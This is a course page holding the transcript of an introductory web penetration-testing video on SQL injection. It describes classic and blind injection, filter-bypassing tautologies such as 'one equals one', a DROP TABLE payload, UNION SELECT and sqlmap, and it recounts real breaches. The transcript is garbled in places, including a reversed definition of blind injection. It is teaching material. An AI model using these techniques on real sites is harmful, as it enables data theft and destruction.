Part 1 - What is SQL Injection

Video Activity

This lesson covers SQL injection. In this lesson, participants learn about: 1. What is a SQL Inject? 2. How it works 3. Types 4. Examples A SQL inject is a form of attack which takes advantage of an improperly filtered user and takes the input acquired to enumerate and manipulate a database. This lesson discusses two types of SQL Injections which a...

Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or

Already have an account? Sign In »

Time
4 hours 20 minutes
Difficulty
Intermediate
CEU/CPE
5
Video Description

This lesson covers SQL injection. In this lesson, participants learn about: 1. What is a SQL Inject? 2. How it works 3. Types 4. Examples A SQL inject is a form of attack which takes advantage of an improperly filtered user and takes the input acquired to enumerate and manipulate a database. This lesson discusses two types of SQL Injections which are classic and blind. The instructor also offers examples of where to inject an SQL.

Video Transcription
00:03
>> Welcome to Cybrary I am Raymond Evans
00:03
>> and I will be your subject matter expert for
00:03
>> sub-areas web app Penetration Testing course.
00:03
This video, we will be discussing SQL injection.
00:03
So what will be covered?
00:03
What does SQL injection, how it works?
00:03
Some types and some examples.
00:03
So what is a SQL Inject?
00:03
Well, a SQL Inject is
00:03
a code injection attack which takes advantage of
00:03
improperly filtered user input to enumerate and
00:03
manipulate a database. What exactly does that mean?
00:03
Well, an attacker can use a statement to send
00:03
commands to a SQL database
00:03
and get information back from it.
00:03
An attacker can also use
00:03
this statement to manipulate
00:03
data on the database as well,
00:03
such as doing things like dumping an entire database.
00:03
Two types of SQL injections we will be
00:03
covering our classic SQL injections
00:03
or SQLI and blind SQL injections or blind SQLI.
00:03
I'm going to be interchanging SQL injection SQLI
00:03
throughout this course because that's how you
00:03
will see it in the real-world.
00:03
You'll see both of those terms used.
00:03
It's a classic SQL injection.
00:03
Well, this type of injection occurs when
00:03
an escape characters are improperly filtered.
00:03
An escape character is something like
00:03
a single or double quote and these are used to
00:03
denote the end of something
00:03
>> and then the beginning of a series of commands.
00:03
>> A SQL Injection command
00:03
is then sent to the SQL application.
00:03
Those results are immediately
00:03
>> displayed to the attacker.
00:03
>> Classic SQL injections utilize where
00:03
clause modification and union operator injections
00:03
to exploit the improper filtering,
00:03
the wearing union modifications
00:03
you will be seeing later on,
00:03
I will be explaining them further.
00:03
Blind SQL Injection is a form of
00:03
SQL injection with the same exact thing
00:03
as normal SQL injection,
00:03
except the attacker is
00:03
able to immediately see the results.
00:03
For web application that
00:03
needs to suffer blind SQL injection,
00:03
it's best to use an automated tool,
00:03
such as one of the tools like Tableau or if you want,
00:03
you can also craft a statement with a SQL Inject to do
00:03
something like create a user account
00:03
or add some kind of data to the database.
00:03
If this works, then you know
00:03
that it's vulnerable to a blind SQL Inject.
00:03
The individual can't perform
00:03
a SQL Inject and get data immediately back.
00:03
However, they can perform a blind SQL Inject to do
00:03
something like dumped the database or add
00:03
a user account for themselves to gain access.
00:03
Where would you exactly inject though?
00:03
Our SQL injections can be placed in various portions of
00:03
a web-page and the source code
00:03
of the page itself as well.
00:03
However, the two most common areas you will find
00:03
them are in the URL and in form fields.
00:03
Here we see couple of
00:03
examples of those attacks and those different fields.
00:03
The URL here we see in the first one,
00:03
and it uses a single escape character to try
00:03
to discover if a SQL injection is possible.
00:03
Same thing with the second one
00:03
is using escape characters,
00:03
try to get a SQL error back.
00:03
A third one here,
00:03
it actually uses a one equal one statement.
00:03
This would be used to try to get data.
00:03
Same thing within the form field here.
00:03
You are telling it that you're looking for anything,
00:03
any username that has one or any username that is true.
00:03
It'll dump out all the user.name because hey,
00:03
all the usernames are true in fact.
00:03
So why exactly is this dangerous?
00:03
Well, a website is vulnerable to SQL injection.
00:03
The site may disclose a lot of sensitive information.
00:03
Stuff like credit card data,
00:03
Social Security numbers, addresses,
00:03
username, and passwords.
00:03
This data can be used to steal identities and money,
00:03
or it can be used to convict
00:03
them over a long period of time.
00:03
In the case of usernames and passwords,
00:03
this can be used to get
00:03
admin credentials and elevate
00:03
their privileges on the system as well.
00:03
So that's another reason why it's really,
00:03
really dangerous is because of privilege escalation.
00:03
If something like this goes
00:03
unchecked for years of pioneers,
00:03
an attacker can just sit back and siphon off data
00:03
and just steal credit cards and
00:03
social security numbers for many, many years.
00:03
If it's left unchecked and
00:03
if there's nothing set up like an IDS
00:03
or IPS to identify these type of attacks.
00:03
Here's a couple of examples of SQL injections.
00:03
In our first one here,
00:03
we see that one equals one statement again.
00:03
This query is recognized as
00:03
true and we'll dump the database onto the screen.
00:03
This is one of the most common examples that you will
00:03
see and it's amazing how much this works.
00:03
Now, you can
00:03
trick a system even if
00:03
it's filtering the classic one equals one.
00:03
Because as long as any variables
00:03
>> are in there whatsoever,
00:03
>> it will do this so you could do Tim or Bob equals Bob.
00:03
As long as that statement,
00:03
and the second portion is equal and correct.
00:03
It will dump the database for you.
00:03
So that's something to watch out for
00:03
if you say, Oh, hey, it's cool.
00:03
We got the classic one equals one filtered.
00:03
Well, do you have banana equals banana
00:03
or dog equals dog? I don't think so.
00:03
Next, we have an example which is asking to
00:03
display every column from
00:03
every table where the ID equals one,
00:03
which would display the entire database.
00:03
This type of statement can be used to
00:03
refine your search even further.
00:03
Here we see select star from star where id equals one.
00:03
Now, those starspots there,
00:03
it can be used to refine your searches so
00:03
that star represents a variable for everything.
00:03
You're saying select everything from
00:03
everything where ID equals one.
00:03
You could say something like select usernames or users.
00:03
If you know the table is called users from customer,
00:03
where ID equals Frank,
00:03
and you would get a list of error by
00:03
name Frank from that database.
00:03
Next, we see an example of how to
00:03
modify something on the table.
00:03
What we're doing is saying select
00:03
everything from everything where ID equals one.
00:03
Then it says drop table, everything.
00:03
If your database was vulnerable to
00:03
SQL injections and somebody was to put this in there.
00:03
It could and would drop your tables,
00:03
which is really bad because it would
00:03
be deleting your database.
00:03
Our final example here,
00:03
the statement below uses
00:03
a SQL post injection to refinance attacks even more.
00:03
So it's showing like above,
00:03
select a variable from
00:03
a variable where type ID equals one.
00:03
Then it uses a union, select,
00:03
union all select statement to define it even further,
00:03
this type of a SQL injection and most likely
00:03
be used with a program such as SQL map,
00:03
which we will be showing later on,
00:03
and I will be demonstrating later on how
00:03
to create a more refined search with
00:03
this string here right now it seems
00:03
like a lot of garbage to you,
00:03
but once we actually practice
00:03
it and show how it's used
00:03
and it'll make a lot more sense.
00:03
Where are some real-world examples
00:03
of SQL injection is being used in impacting people?
00:03
Well on 2008, sexual and violent offenders
00:03
registry of Oklahoma had
00:03
10,597 Social Security Numbers
00:03
belonging to sexual offender stolen via SQL Inject.
00:03
2002, guess.com was
00:03
vulnerable to SQL injection attack print remaining,
00:03
anybody who can construct
00:03
a properly-crafted URL to pull
00:03
down towards a 1,000 plus names,
00:03
credit card numbers, and
00:03
expiration dates in the site's customer database.
00:03
Then in 2011, LulzSec was accused of
00:03
using SQL injection to steal coupons,
00:03
download keys, and passwords that are
00:03
stored in plain text on Sony's website.
00:03
The guess.com vulnerability,
00:03
the SQL injection vulnerability
00:03
>> that was there was one of
00:03
>> the one equals one statements that you
00:03
had seen in the URL itself.
00:03
That's one example of where that was used.
00:03
As for the 2011 LulzSec attack,
00:03
you never store anything that's
00:03
sensitive in plain text ever anywhere.
00:03
What was covered? Well,
00:03
I talked about what a SQL Inject is,
00:03
showed a couple of examples,
00:03
talked about how it works,
00:03
talked about some types of SQL injections and then
00:03
gave you some real-world examples.
00:03
Happy hacking everyone.
Up Next